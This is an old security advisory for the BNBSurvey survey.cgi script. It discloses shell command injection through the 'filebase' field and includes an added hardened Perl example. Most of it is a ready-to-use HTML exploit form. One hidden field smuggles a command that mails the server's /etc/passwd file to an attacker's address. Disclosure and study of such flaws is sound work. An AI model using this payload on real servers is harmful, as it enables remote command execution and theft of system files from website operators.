Vulnerable program: BNBSurvey (survey.cgi)
	 Platforms: UNIX
	    Impact: in certain circumstances, remote users can execute arbitrary
		    commands as the uid of the webserver 
	  Found By: duke (duke@viper.net.au - duke@el8.org)
     Advisory Made: Thursday, December 3, 1998

Information
-----------

BNBSurvey is a CGI for doing simple surveys, and is available at:
http://bignosebird.com/carchive/survey.shtml. This script has two modes of
operation: the first being that people can vote as many times as they like,
and the second being that people can only vote once every hour. The
first mode is the default.

If the second mode of operation is enabled, however (i.e. if $ENFORCEMENT = "1"
is set in the CGI script), remote users can use shell metacharacters in the
'filebase' variable to execute arbitrary commands.
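As an added example (not part of this advisory and not BNBSurvey's own code), the following shows how the enforcement-mode file handling could be written so that 'filebase' never reaches a shell. It assumes the script is Perl and that the original built a shell command string containing the variable; the lock-file path and the function names are hypothetical.

```perl
#!/usr/bin/perl -T
# Added example, not from the advisory or from BNBSurvey itself.
# Assumption: in enforcement mode the original script interpolated
# $filebase into a shell command. This is the hardened counterpart.
use strict;
use warnings;

# Accept only a plain file stem: letters, digits, underscore, hyphen.
# No path separators and no shell metacharacters can get through.
# Returns the untainted value, or undef if the input is rejected.
sub validate_filebase {
    my ($value) = @_;
    return undef unless defined $value;
    return undef unless $value =~ /\A([A-Za-z0-9_-]{1,32})\z/;
    return $1;    # a regex capture is untainted under -T
}

# Vulnerable pattern, shown only for contrast and never called here:
# metacharacters in $filebase are interpreted by /bin/sh.
sub vulnerable_touch {
    my ($filebase) = @_;
    system("touch /tmp/survey_$filebase.lock");
}

# Hardened replacement: validated name, Perl built-ins, no shell at all.
sub hardened_touch {
    my ($filebase) = @_;
    my $safe = validate_filebase($filebase)
        or die "rejected filebase\n";
    my $path = "/tmp/survey_$safe.lock";    # hypothetical lock-file location
    open(my $fh, '>>', $path) or die "cannot open $path: $!\n";
    close $fh;
    return $path;
}

# Constructed inputs: a normal name is accepted, an advisory-style
# payload carrying ';' and '<' is rejected before any file is touched.
for my $candidate ('survey1', 'bleh; /bin/mail x</etc/passwd; w') {
    my $result = validate_filebase($candidate);
    printf "%-40s => %s\n", $candidate,
        defined $result ? "accepted ($result)" : "rejected";
}
```

Running the script under -T as shown also makes Perl itself refuse to pass any unvalidated CGI input to open() or system().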

Exploit
-------

The following form is a sample exploit. It must be modified to point to the
victim's CGI script. This example mails the /etc/passwd file on the server to
you.

<HTML>
<BODY BGCOLOR="#FFFFFF">
<CENTER>
<FONT FACE="ARIAL">
<H2>The BigNoseBird.Com<BR>
    Survey Demonstration
</H2>
<HR WIDTH=450>
</CENTER>

</FONT>
  <FORM METHOD="POST" ACTION="www.victim.com/cgi-bin/survey.cgi">
  <input type=hidden name=action value="VOTE">
  <input type=hidden name=filebase value="bleh; /bin/mail you@your_email_address.com</etc/passwd; w">
<PRE>
  Your Gender
   <input type=radio name=ITEM1 value="0">Male
   <input type=radio name=ITEM1 value="1">Female
   <input type=radio name=ITEM1 value="2">Neuter

  Your Age
   <input type=radio name=ITEM2 value="0">Under 18
   <input type=radio name=ITEM2 value="1">18-35
   <input type=radio name=ITEM2 value="2">36+

  How did you find us?
   <input type=radio name=ITEM3 value="0">Search Engine
   <input type=radio name=ITEM3 value="1">Directory
   <input type=radio name=ITEM3 value="2">Link
   <input type=radio name=ITEM3 value="3">Referral
   <input type=radio name=ITEM3 value="4">Accident

 <INPUT TYPE="submit" VALUE="VOTE!"><input type="reset" value=" Clear-Form">
</PRE>
  </FORM>